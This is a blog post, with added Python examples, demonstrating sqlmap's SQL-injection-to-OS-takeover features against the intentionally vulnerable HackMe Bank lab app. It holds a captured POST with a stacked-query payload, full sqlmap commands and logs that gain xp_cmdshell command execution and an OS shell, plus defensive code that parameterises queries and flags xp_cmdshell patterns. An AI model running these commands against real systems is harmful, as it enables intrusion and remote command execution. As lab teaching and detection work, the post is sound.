Thursday, 24 May 2012

SQLMap - Operating System Takeover - Windows

Today I'm trying out the "OS takeover" feature of sqlmap. sqlmap can be used to get a command shell through SQL injection, and it provides the following options for OS-level access:

  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system
    --os-cmd=OSCMD      Execute an operating system command
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an out-of-band shell, meterpreter or VNC
    --os-smbrelay       One click prompt for an OOB shell, meterpreter or VNC
    --os-bof            Stored procedure buffer overflow exploitation
    --priv-esc          Database process' user privilege escalation
    --msf-path=MSFPATH  Local path where Metasploit Framework is installed
    --tmp-path=TMPPATH  Remote absolute path of temporary files directory

sqlmap uses different methods to achieve operating system access depending on the database type. Please read the sqlmap documentation for more information.

The target I used for this is HackMe Bank from Foundstone, installed on a Windows XP machine (IP: 192.168.1.4). HackMe Bank is a vulnerable application written in ASP.NET with MSSQL as the backend database. The attacker machine is BackTrack 5 (IP: 192.168.1.3). Let's browse the target site.

Let's test for basic SQL injection by injecting a single quote (') into the username field of the login page.

And the result is

The "Username" field seems to be vulnerable to SQL injection. Let's capture the login request and feed it to sqlmap for further analysis. We can use the -r option of sqlmap to supply the raw POST request, which looks like this:

POST /HacmeBank_v2_Website/aspx/login.aspx HTTP/1.1
Host: 192.168.1.4
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://192.168.1.4/HacmeBank_v2_Website/aspx/login.aspx
Content-Type: application/x-www-form-urlencoded
Content-Length: 210

__VIEWSTATE=%2FwEPDwUJMzIyNTUyNzAyZGQX7Zm1%2Fne8qfz4FyjBx4QNynpGLw%3D%3D&txtUserName=asd&txtPassword=asd&btnSubmit=Submit&__EVENTVALIDATION=%2FwEWBAL6k9jHDwKl1bKzCQK1qbSRCwLCi9reA9W4eRmwDA5P7LP7g%2BMJe%2Fifr7tT

Let's run sqlmap. I used --dbms=MSSQL and --technique=S (the stacked queries technique) to save time, as I already knew these details.

root@bt:/pentest/database/sqlmap# ./sqlmap.py -r hackme.txt -p txtUserName --dbms=MSSQL --technique=S

    sqlmap/1.0-dev (r5068) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:50:36

[14:50:36] [INFO] parsing HTTP request from 'hackme.txt'
[14:50:36] [INFO] using '/pentest/database/sqlmap/output/192.168.1.4/session' as session file
[14:50:36] [INFO] testing connection to the target url
[14:50:37] [INFO] heuristics detected web page charset 'ascii'
[14:50:38] [WARNING] reflective value(s) found and filtering out
[14:50:38] [WARNING] heuristic test shows that POST parameter 'txtUserName' might not be injectable
[14:50:38] [INFO] testing sql injection on POST parameter 'txtUserName'
[14:50:38] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[14:50:38] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..    
[14:51:00] [INFO] POST parameter 'txtUserName' is 'Microsoft SQL Server/Sybase stacked queries' injectable
[14:51:00] [INFO] checking if the injection point on POST parameter 'txtUserName' is a false positive
POST parameter 'txtUserName' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 18 HTTP(s) requests:
---
Place: POST
Parameter: txtUserName
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUJMzIyNTUyNzAyZGQX7Zm1/ne8qfz4FyjBx4QNynpGLw==&txtUserName=asd'; WAITFOR DELAY '0:0:5';--&txtPassword=asd&btnSubmit=Submit&__EVENTVALIDATION=/wEWBAL6k9jHDwKl1bKzCQK1qbSRCwLCi9reA9W4eRmwDA5P7LP7g+MJe/ifr7tT
---

[14:51:15] [INFO] testing Microsoft SQL Server
[14:51:15] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[14:51:20] [INFO] confirming Microsoft SQL Server
[14:51:30] [INFO] adjusting time delay to 2 seconds due to good response times
[14:51:30] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows XP
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 5.1
back-end DBMS: Microsoft SQL Server 2005
[14:51:30] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.1.4'

[*] shutting down at 14:51:30

root@bt:/pentest/database/sqlmap#

sqlmap has detected the injection and presented us with the operating system, web application technology and back-end DBMS details. You can go ahead and dig out more details about databases, tables, columns, users, etc.
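To make the finding concrete from the defender's side, here is an added Python example (not code from the original post or from sqlmap) that reads a raw request the way the -r option does, rebuilds the kind of string-concatenated login query that lets the stacked payload run as a second statement, and contrasts it with a parameterised query that treats the same input as plain data. The user table, the jv/jv789 credential and the use of SQLite in place of MSSQL are constructed assumptions; the request is the post's login POST with sqlmap's reported payload URL-encoded into txtUserName.

```python
import sqlite3
import textwrap
import urllib.parse

# Constructed raw request in the format sqlmap's -r option reads: the login
# POST from this post with sqlmap's stacked-queries payload URL-encoded into
# txtUserName. Headers are trimmed to the ones that matter here.
RAW_REQUEST = textwrap.dedent("""\
    POST /HacmeBank_v2_Website/aspx/login.aspx HTTP/1.1
    Host: 192.168.1.4
    Content-Type: application/x-www-form-urlencoded

    __VIEWSTATE=%2FwEPDwUJMzIyNTUyNzAyZGQX7Zm1%2Fne8qfz4FyjBx4QNynpGLw%3D%3D&txtUserName=asd%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--&txtPassword=asd&btnSubmit=Submit
    """)


def parse_raw_request(raw):
    """Splits a raw HTTP request into (method, path, headers, form fields)."""
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    method, path, _version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    form = {k: v[0] for k, v in
            urllib.parse.parse_qs(body.strip(), keep_blank_values=True).items()}
    return method, path, headers, form


def vulnerable_query(username, password):
    """Builds the login query by string concatenation, the defect sqlmap found.
    Returns the SQL text so the effect of the payload is visible."""
    return ("SELECT username FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")


def split_batch(sql):
    """Splits batch text into statements the way a T-SQL batch would run them:
    ';' outside single-quoted literals separates statements, '--' discards the
    rest of the line. Constructed helper, not sqlmap's or SQL Server's parser."""
    statements, current, in_string, i = [], [], False, 0
    while i < len(sql):
        ch = sql[i]
        if in_string:
            current.append(ch)
            if ch == "'":
                if sql.startswith("'", i + 1):      # '' is an escaped quote
                    current.append("'")
                    i += 1
                else:
                    in_string = False
        elif ch == "'":
            in_string = True
            current.append(ch)
        elif sql.startswith("--", i):
            newline = sql.find("\n", i)
            i = len(sql) if newline == -1 else newline
            continue
        elif ch == ";":
            statements.append("".join(current).strip())
            current = []
        else:
            current.append(ch)
        i += 1
    statements.append("".join(current).strip())
    return [s for s in statements if s]


def make_db():
    """Constructed stand-in for the application's user table. SQLite is used
    only so the example runs offline; the real target was MSSQL."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('jv', 'jv789')")  # invented credential
    conn.commit()
    return conn


def safe_lookup(conn, username, password):
    """Hardened form: a parameterised query binds the input as a literal value,
    so the payload is compared as a username and simply matches nothing.
    (A real application would also compare password hashes, not plaintext.)"""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    method, path, headers, form = parse_raw_request(RAW_REQUEST)
    sql = vulnerable_query(form["txtUserName"], form["txtPassword"])
    print(method, path, headers["host"])
    print("concatenated batch:", sql)
    print("statements the server would run:", split_batch(sql))
    conn = make_db()
    print("parameterised lookup with payload:",
          safe_lookup(conn, form["txtUserName"], form["txtPassword"]))
```

The concatenated text splits into two statements, the original SELECT and the injected WAITFOR DELAY, with the trailing `--` swallowing the rest of the application's query; that is exactly why the time-based stacked technique works on a driver that submits whole batches. The parameterised version never produces a second statement, whatever the input contains.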

1. Option: --os-cmd=OSCMD

sqlmap executes a single system command and displays its output. On MSSQL, sqlmap uses the xp_cmdshell extended stored procedure for OS access. I'll demonstrate the hostname command:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -r hackme.txt -p txtUserName --dbms=MSSQL --technique=S --os-cmd=hostname

    sqlmap/1.0-dev (r5068) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:32:07

[16:32:07] [INFO] parsing HTTP request from 'hackme.txt'
[16:32:07] [INFO] using '/pentest/database/sqlmap/output/192.168.1.4/session' as session file
[16:32:07] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file
[16:32:07] [INFO] testing connection to the target url
[16:32:09] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtUserName
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUJMzIyNTUyNzAyZGQX7Zm1/ne8qfz4FyjBx4QNynpGLw==&txtUserName=asd'; WAITFOR DELAY '0:0:5';--&txtPassword=asd&btnSubmit=Submit&__EVENTVALIDATION=/wEWBAL6k9jHDwKl1bKzCQK1qbSRCwLCi9reA9W4eRmwDA5P7LP7g+MJe/ifr7tT
---

[16:32:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows XP
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 5.1
back-end DBMS: Microsoft SQL Server 2005
[16:32:09] [INFO] testing if current user is DBA
[16:32:09] [INFO] resumed: 1
[16:32:09] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..    
[16:32:18] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[16:32:19] [INFO] testing if xp_cmdshell extended procedure is usable
[16:32:46] [INFO] adjusting time delay to 2 seconds due to good response times
[16:33:19] [INFO] xp_cmdshell extended procedure is usable
do you want to retrieve the command standard output? [Y/n/a] Y
[16:33:24] [INFO] retrieved: XP_FDCC 
command standard output:    'XP_FDCC'

[16:34:24] [INFO] cleaning up the database management system
[16:34:24] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.1.4'

[*] shutting down at 16:34:24

root@bt:/pentest/database/sqlmap#

2. Option: --os-shell

sqlmap drops you into an interactive shell where you can run commands one after another.

root@bt:/pentest/database/sqlmap# ./sqlmap.py -r hackme.txt -p txtUserName --dbms=MSSQL --technique=S --os-shell

    sqlmap/1.0-dev (r5068) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:34:33

[16:34:33] [INFO] parsing HTTP request from 'hackme.txt'
[16:34:33] [INFO] using '/pentest/database/sqlmap/output/192.168.1.4/session' as session file
[16:34:33] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file
[16:34:33] [INFO] testing connection to the target url
[16:34:34] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtUserName
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUJMzIyNTUyNzAyZGQX7Zm1/ne8qfz4FyjBx4QNynpGLw==&txtUserName=asd'; WAITFOR DELAY '0:0:5';--&txtPassword=asd&btnSubmit=Submit&__EVENTVALIDATION=/wEWBAL6k9jHDwKl1bKzCQK1qbSRCwLCi9reA9W4eRmwDA5P7LP7g+MJe/ifr7tT
---

[16:34:34] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows XP
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 5.1
back-end DBMS: Microsoft SQL Server 2005
[16:34:34] [INFO] testing if current user is DBA
[16:34:34] [INFO] resumed: 1
[16:34:34] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..    
[16:34:44] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[16:34:44] [INFO] testing if xp_cmdshell extended procedure is usable
[16:35:11] [INFO] adjusting time delay to 2 seconds due to good response times
[16:35:50] [ERROR] invalid character detected. retrying..
[16:35:50] [WARNING] increasing time delay to 3 seconds
[16:36:10] [INFO] xp_cmdshell extended procedure is usable
[16:36:10] [INFO] going to use xp_cmdshell extended procedure for operating system command execution
[16:36:10] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> hostname
do you want to retrieve the command standard output? [Y/n/a] Y
[16:40:35] [INFO] retrieved: XP_FDCC 
command standard output:    'XP_FDCC'

os-shell> q
[16:43:00] [INFO] cleaning up the database management system
[16:43:00] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.1.4'

[*] shutting down at 16:43:00

root@bt:/pentest/database/sqlmap#
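Both --os-cmd and --os-shell above leave the same trail on the database side: a WAITFOR DELAY probe, statements stacked after a closed string literal and terminated with --, and calls to xp_cmdshell (which sqlmap first checks is usable, as the logs show). The following added Python example, which is not code from the post or from sqlmap, classifies T-SQL batch text the way a SQL Server audit or Extended Events review would. The rows are constructed and invented; the field names event_time, server_principal_name and statement mirror the SQL Server Audit log columns but nothing here came from a real capture.

```python
import re
from collections import Counter

# Constructed sample rows. Field names follow the SQL Server Audit log columns
# event_time / server_principal_name / statement; every value is invented.
SAMPLE_EVENTS = [
    {"event_time": "2012-05-24T14:50:10", "server_principal_name": "hacmebank_app",
     "statement": "SELECT user_id FROM users WHERE username = 'jv' AND password = 'jv789'"},
    {"event_time": "2012-05-24T14:50:38", "server_principal_name": "hacmebank_app",
     "statement": "SELECT user_id FROM users WHERE username = 'asd'; WAITFOR DELAY '0:0:5';--' AND password = 'asd'"},
    {"event_time": "2012-05-24T16:33:19", "server_principal_name": "hacmebank_app",
     "statement": "SELECT user_id FROM users WHERE username = 'asd'; EXEC master..xp_cmdshell 'hostname';--' AND password = 'asd'"},
    {"event_time": "2012-05-24T16:32:50", "server_principal_name": "hacmebank_app",
     "statement": "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE"},
]

# Detection rules, each named after the marker visible in this post's run.
RULES = [
    # time-based probe sqlmap used to confirm the stacked injection
    ("time_delay_probe", re.compile(r"\bWAITFOR\s+DELAY\b", re.I)),
    # a literal is closed, a new statement follows, and '--' eats the remainder
    ("stacked_after_literal", re.compile(r"'\s*;\s*\S.*--", re.I | re.S)),
    # any mention of the extended procedure used for command execution
    ("xp_cmdshell_reference", re.compile(r"\bxp_cmdshell\b", re.I)),
    # the procedure being switched on, which an application login never needs
    ("xp_cmdshell_enable", re.compile(r"\bsp_configure\s*'xp_cmdshell'\s*,\s*1\b", re.I)),
]


def classify(statement):
    """Returns the names of every rule the batch text trips, in RULES order."""
    return [name for name, rx in RULES if rx.search(statement)]


def triage(events):
    """Keeps only the events that trip at least one rule, with who ran them."""
    findings = []
    for ev in events:
        hits = classify(ev["statement"])
        if hits:
            findings.append({"event_time": ev["event_time"],
                             "principal": ev["server_principal_name"],
                             "rules": hits})
    return findings


def rule_counts(findings):
    """Counts how often each rule fired, for a quick summary of the capture."""
    return Counter(r for f in findings for r in f["rules"])


if __name__ == "__main__":
    found = triage(SAMPLE_EVENTS)
    for f in found:
        print(f["event_time"], f["principal"], ", ".join(f["rules"]))
    print(dict(rule_counts(found)))
```

The two conditions sqlmap tests for before it runs anything, "current user is DBA" and "xp_cmdshell extended procedure is usable", are the two things to fix on the server: the application login should not be a member of the sysadmin role, and xp_cmdshell should stay disabled, so that a stacked injection on its own cannot reach the operating system. In a real audit the same rules would run over the statement column of the audit file rather than over this constructed list.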

3. Option: --os-pwn

sqlmap provides various ways to connect back from the database server, such as a Metasploit meterpreter session, an out-of-band shell and VNC. Again, read the sqlmap documentation for more information. The following video demonstrates the meterpreter reverse shell technique:

This concludes the operating system takeover with sqlmap. In the next blog post, I'll try to take over a Linux host.

Hope you like this. Let me know your views, comments, suggestions, etc.

20 comments:

  1. Wonderful... nicely demonstrated.

    Thanks
    R@J

  2. Nice one amol. Like it :)

    BTW, can you increase the font size of the monospaced ones? They are too tiny to read :|

  3. Thanks @raj0009.
    Nice catch @Vaibhav, will keep in mind to increase the font size for video.

  7. This would work for any OS, right?
    Like, for example, in Linux we can give,
    --os-cmd=whoami
    ?
    Or does sqlmap only support the Windows XP exploit?
